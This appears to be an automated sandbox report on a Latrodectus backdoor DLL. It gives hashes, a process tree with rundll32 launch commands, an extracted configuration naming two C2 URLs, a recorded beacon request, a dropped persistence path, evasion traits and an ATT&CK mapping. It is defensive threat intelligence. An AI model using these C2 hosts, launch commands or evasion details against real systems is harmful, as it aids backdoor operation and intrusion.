Edit tour

Windows Analysis Report
r2iL9TLvO3.dll

Overview

General Information

Sample name:	r2iL9TLvO3.dll (renamed file extension from exe to dll, renamed because original name is a hash value)
Original sample name:	9645a12079edffd20560d4631160a6052ae5728d6f73b7366588166ad281c534.exe
Analysis ID:	1469006
MD5:	d46476f7f27be8ef618b7646a46f5e66
SHA1:	8219d1ead31d16f6380941827bf96a488453d5c0
SHA256:	9645a12079edffd20560d4631160a6052ae5728d6f73b7366588166ad281c534
Tags:	exeLatrodectus
Infos:

Detection

Latrodectus

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected Latrodectus

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Deletes itself after installation

Sample uses string decryption to hide its real strings

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to query network adapater information

Creates COM task schedule object (often to register a task for autostart)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses a known web browser user agent for HTTP communication

Classification

Process Tree

System is w10x64

loaddll64.exe (PID: 7480 cmdline: loaddll64.exe "C:\Users\user\Desktop\r2iL9TLvO3.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)

conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7528 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\r2iL9TLvO3.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

rundll32.exe (PID: 7556 cmdline: rundll32.exe "C:\Users\user\Desktop\r2iL9TLvO3.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)

rundll32.exe (PID: 7540 cmdline: rundll32.exe C:\Users\user\Desktop\r2iL9TLvO3.dll,extra MD5: EF3179D498793BF4234F708D3BE28633)

rundll32.exe (PID: 7620 cmdline: rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dll", extra MD5: EF3179D498793BF4234F708D3BE28633)

rundll32.exe (PID: 7728 cmdline: rundll32.exe C:\Users\user\Desktop\r2iL9TLvO3.dll,follower MD5: EF3179D498793BF4234F708D3BE28633)

rundll32.exe (PID: 7764 cmdline: rundll32.exe C:\Users\user\Desktop\r2iL9TLvO3.dll,run MD5: EF3179D498793BF4234F708D3BE28633)

rundll32.exe (PID: 7640 cmdline: rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dll", extra MD5: EF3179D498793BF4234F708D3BE28633)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Unidentified 111 (Latrodectus), Latrodectus	First discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware.	No Attribution	https://0x0d4y.blog/case-study-analyzing-and-implementing-string-decryption-algorithms-latrodectus/ https://0x0d4y.blog/latrodectus-technical-analysis-of-the-new-icedid/ https://any.run/malware-trends/latrodectus https://blog.reveng.ai/latrodectus-distribution-via-brc4/ https://embee-research.ghost.io/phishing-domain-analysis-with-passive-dns-latrodectus/	https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_111

Malware Configuration

Threatname: Latrodectus

{"C2 url": ["https://winarkamaps.com/live/", "https://stratimasesstr.com/live/"], "Group Name": "Facial", "Campaign ID": 3828029093}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
r2iL9TLvO3.dll	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dll	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
00000003.00000003.1294422202.000001ED7A460000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
00000006.00000002.2556577168.00000081943F8000.00000004.00000010.00020000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
Process Memory Space: rundll32.exe PID: 7620	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
decrypted.binstr	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author
6.2.rundll32.exe.7ffb1c810000.0.unpack	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
3.3.rundll32.exe.1ed7a460000.0.raw.unpack	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
3.2.rundll32.exe.7ffb1e860000.0.unpack	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
3.3.rundll32.exe.1ed7a460000.0.unpack	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security

HTTP traffic detected: POST /live/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: winarkamaps.comContent-Length: 252Cache-Control: no-cache

Source: rundll32.exe, 00000006.00000002.2557574678.000001B8F4C49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stratimasesstr.com/
Source: rundll32.exe, 00000006.00000002.2557574678.000001B8F4C49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stratimasesstr.com/F
Source: rundll32.exe, 00000006.00000002.2557574678.000001B8F4C49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stratimasesstr.com/live/
Source: rundll32.exe, 00000006.00000002.2557574678.000001B8F4C49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stratimasesstr.com/live/$
Source: rundll32.exe, 00000006.00000002.2557574678.000001B8F4C49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stratimasesstr.com/live/l
Source: rundll32.exe, 00000006.00000003.2482822204.000001B8F4C10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://winarkamaps.com/
Source: rundll32.exe, 00000006.00000002.2557574678.000001B8F4C49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://winarkamaps.com/%
Source: rundll32.exe, 00000006.00000002.2557574678.000001B8F4C49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://winarkamaps.com/live/
Source: rundll32.exe, 00000006.00000002.2557574678.000001B8F4C0B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2482822204.000001B8F4C10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://winarkamaps.com/live/F
Source: rundll32.exe, 00000006.00000002.2557574678.000001B8F4BF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://winarkamaps.com/live/al
Source: rundll32.exe, 00000006.00000002.2557574678.000001B8F4C49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://winarkamaps.com/live/comp
Source: rundll32.exe, 00000006.00000002.2557574678.000001B8F4C49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://winarkamaps.com/m/=
Source: rundll32.exe, 00000006.00000002.2557574678.000001B8F4C49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://winarkamaps.com/q

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49708 version: TLS 1.2

Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FFB1E86AD34 NtAllocateVirtualMemory,	3_2_00007FFB1E86AD34
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FFB1E867A54 NtWriteFile,	3_2_00007FFB1E867A54
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FFB1E867B40 NtFreeVirtualMemory,	3_2_00007FFB1E867B40
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FFB1E86463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,FindCloseChangeNotification,	3_2_00007FFB1E86463C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FFB1E86378C NtClose,	3_2_00007FFB1E86378C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FFB1E867588 RtlInitUnicodeString,NtCreateFile,NtClose,	3_2_00007FFB1E867588
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FFB1E8677B0 RtlInitUnicodeString,NtCreateFile,	3_2_00007FFB1E8677B0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FFB1E867ACC NtClose,	3_2_00007FFB1E867ACC
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FFB1E86B1D4 NtQueryValueKey,NtQueryValueKey,NtClose,	3_2_00007FFB1E86B1D4
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FFB1E8678C0 NtReadFile,	3_2_00007FFB1E8678C0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FFB1E8679C8 NtClose,	3_2_00007FFB1E8679C8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FFB1E86C934 NtDelayExecution,	3_2_00007FFB1E86C934
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FFB1E86745C RtlInitUnicodeString,NtOpenFile,NtClose,	3_2_00007FFB1E86745C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FFB1E867694 RtlInitUnicodeString,NtDeleteFile,	3_2_00007FFB1E867694
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FFB1E867704 NtQueryInformationFile,	3_2_00007FFB1E867704
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00007FFB1C81C934 NtDelayExecution,	6_2_00007FFB1C81C934
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00007FFB1C81AD34 NtAllocateVirtualMemory,	6_2_00007FFB1C81AD34
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00007FFB1C81463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,FindCloseChangeNotification,	6_2_00007FFB1C81463C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00007FFB1C817B40 NtFreeVirtualMemory,	6_2_00007FFB1C817B40
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00007FFB1C81378C NtClose,	6_2_00007FFB1C81378C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00007FFB1C8177B0 RtlInitUnicodeString,NtCreateFile,	6_2_00007FFB1C8177B0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00007FFB1C81B1D4 NtQueryValueKey,NtQueryValueKey,NtClose,	6_2_00007FFB1C81B1D4
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00007FFB1C8179C8 NtClose,	6_2_00007FFB1C8179C8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00007FFB1C817A54 NtWriteFile,	6_2_00007FFB1C817A54
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00007FFB1C81745C RtlInitUnicodeString,NtOpenFile,NtClose,	6_2_00007FFB1C81745C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00007FFB1C817694 RtlInitUnicodeString,NtDeleteFile,	6_2_00007FFB1C817694
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00007FFB1C817588 RtlInitUnicodeString,NtCreateFile,NtClose,	6_2_00007FFB1C817588
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00007FFB1C817ACC NtClose,	6_2_00007FFB1C817ACC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00007FFB1C8178C0 NtReadFile,	6_2_00007FFB1C8178C0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00007FFB1C817704 NtQueryInformationFile,	6_2_00007FFB1C817704

Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FFB1E861030		3_2_00007FFB1E861030
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00007FFB1C811030		6_2_00007FFB1C811030

Source: classification engine

Classification label: mal100.troj.winDLL@15/1@2/1

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00007FFB1E868820 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,

3_2_00007FFB1E868820

Source: C:\Windows\System32\rundll32.exe

File created: C:\Users\user\AppData\Roaming\Custom_update

Jump to behavior

Source: C:\Windows\System32\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\runnung
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7488:120:WilError_03

Source: r2iL9TLvO3.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll64.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll64.exe

Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\r2iL9TLvO3.dll,extra

Source: r2iL9TLvO3.dll	Virustotal: Detection: 79%
Source: r2iL9TLvO3.dll	ReversingLabs: Detection: 65%

Source: unknown	Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\r2iL9TLvO3.dll"
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\r2iL9TLvO3.dll",#1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\r2iL9TLvO3.dll,extra
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\r2iL9TLvO3.dll",#1
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dll", extra
Source: unknown	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dll", extra
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\r2iL9TLvO3.dll,follower
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\r2iL9TLvO3.dll,run
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\r2iL9TLvO3.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\r2iL9TLvO3.dll,extra	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\r2iL9TLvO3.dll,follower	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\r2iL9TLvO3.dll,run	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\r2iL9TLvO3.dll",#1	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dll", extra	Jump to behavior

Source: C:\Windows\System32\loaddll64.exe

Section loaded: apphelp.dll

Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: r2iL9TLvO3.dll

Static PE information: Image base 0x180000000 > 0x60000000

Source: r2iL9TLvO3.dll

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source: r2iL9TLvO3.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: C:\Windows\System32\rundll32.exe

File created: C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dll

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\System32\rundll32.exe

File deleted: c:\users\user\desktop\r2il9tlvo3.dll

Jump to behavior

Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\rundll32.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,	3_2_00007FFB1E8668E8
Source: C:\Windows\System32\rundll32.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,	3_2_00007FFB1E867FA8
Source: C:\Windows\System32\rundll32.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,	6_2_00007FFB1C817FA8
Source: C:\Windows\System32\rundll32.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,	6_2_00007FFB1C8168E8

Source: C:\Windows\System32\rundll32.exe	Window / User API: threadDelayed 657			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Window / User API: threadDelayed 8882			Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dll

Jump to dropped file

Source: C:\Windows\System32\rundll32.exe TID: 7624	Thread sleep count: 56 > 30	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 7624	Thread sleep time: -56000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 7636	Thread sleep count: 657 > 30	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 7636	Thread sleep time: -65700s >= -30000s	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 7624	Thread sleep count: 8882 > 30	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 7624	Thread sleep time: -8882000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FFB1E86A350 FindFirstFileW,FindNextFileW,LoadLibraryW,	3_2_00007FFB1E86A350
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FFB1E861A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	3_2_00007FFB1E861A08
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00007FFB1C81A350 FindFirstFileW,FindNextFileW,LoadLibraryW,	6_2_00007FFB1C81A350
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00007FFB1C811A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	6_2_00007FFB1C811A08

Source: rundll32.exe, 00000006.00000002.2557574678.000001B8F4BA8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MWrod_VMware_SATA_CD00#4&224f42ef&
Source: rundll32.exe, 00000003.00000002.1294789039.000001ED788D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rod_VMware_SATA_CD00#4&22-00a0c91efb8b}\Device\C806e6f6e6963}\DosDevices\D:V
Source: rundll32.exe, 00000006.00000002.2557574678.000001B8F4C0B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2557574678.000001B8F4C35000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2482822204.000001B8F4C10000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2557574678.000001B8F4BF5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000006.00000002.2557574678.000001B8F4BA8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rod_VMware_SATA_CD00#4&22-00a0c91efb8b}\Device\C806e6f6e6963}\DosDevices\D:oW

Source: C:\Windows\System32\rundll32.exe	API call chain: ExitProcess graph end node			graph_3-4086
Source: C:\Windows\System32\rundll32.exe	API call chain: ExitProcess graph end node			graph_6-3588

Source: C:\Windows\System32\loaddll64.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\r2iL9TLvO3.dll",#1

Jump to behavior

Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00007FFB1E868AE0 GetUserNameA,wsprintfA,

3_2_00007FFB1E868AE0

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00007FFB1E868560 RtlGetVersion,GetVersionExW,

3_2_00007FFB1E868560

Stealing of Sensitive Information

Yara detected Latrodectus

Source: Yara match	File source: r2iL9TLvO3.dll, type: SAMPLE
Source: Yara match	File source: 6.2.rundll32.exe.7ffb1c810000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.1ed7a460000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.7ffb1e860000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.1ed7a460000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1294422202.000001ED7A460000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2556577168.00000081943F8000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7620, type: MEMORYSTR
Source: Yara match	File source: decrypted.binstr, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dll, type: DROPPED

Remote Access Functionality

Yara detected Latrodectus

Source: Yara match	File source: r2iL9TLvO3.dll, type: SAMPLE
Source: Yara match	File source: 6.2.rundll32.exe.7ffb1c810000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.1ed7a460000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.7ffb1e860000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.1ed7a460000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1294422202.000001ED7A460000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2556577168.00000081943F8000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7620, type: MEMORYSTR
Source: Yara match	File source: decrypted.binstr, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dll, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	11 Process Injection	1 Masquerading	OS Credential Dumping	111 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	2 Virtualization/Sandbox Evasion	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	11 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Rundll32	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Account Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 File and Directory Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	12 System Information Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
